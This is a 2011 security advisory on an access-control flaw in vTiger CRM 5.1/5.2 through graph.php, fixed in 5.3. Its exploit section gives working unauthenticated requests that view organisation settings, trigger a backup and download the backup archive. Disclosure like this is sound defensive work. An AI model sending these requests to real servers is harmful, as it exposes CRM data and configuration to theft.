Here a old vulnerability submitted to vTiger Team last summer. As the 5.3 release was released some week ago, I can now publish this advisory.
Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module using graph.php Release Date: 2011-05-08 Author: Francois Harvey, gestion medsecure (francois.harvey at medsecure dot ca) - http://medsecure.ca Application: Vtiger CRM 5.2.x, 5.1.x Severity: High Risk: High Vendor Status: notified fixed in 5.3 OVERVIEW "vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support." VULNERABILITY Some module (Many in Setting, but also Portal) from vtiger CRM don't verify the user access level and may be called in anonymous mode using the graph.php script. This vulnerability can be used to view or modify some configurations setting (organisation name, templates, backup). EXPLOIT # Show Organization information http://x.x.x.x/vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings # Launching Backup and get the backup file (if enabled) 1) Start a Backup POST /vtigercrm/graph.php server_type=local_backup&module=Settings&action=BackupServerConfig&local_server_mode=&parenttab=Settings&enable_local_backup=on&backupnow=Backup+Now 2) Find the backup name in the output Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip 3) Get the Dumpfile GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip FIX Upgrade to 5.3.x AUTHOR François Harvey - CISM/CISSP/TCSE Professionnel en sécurité de l'information Gestion medsecure medsecure.ca - francoisharvey.ca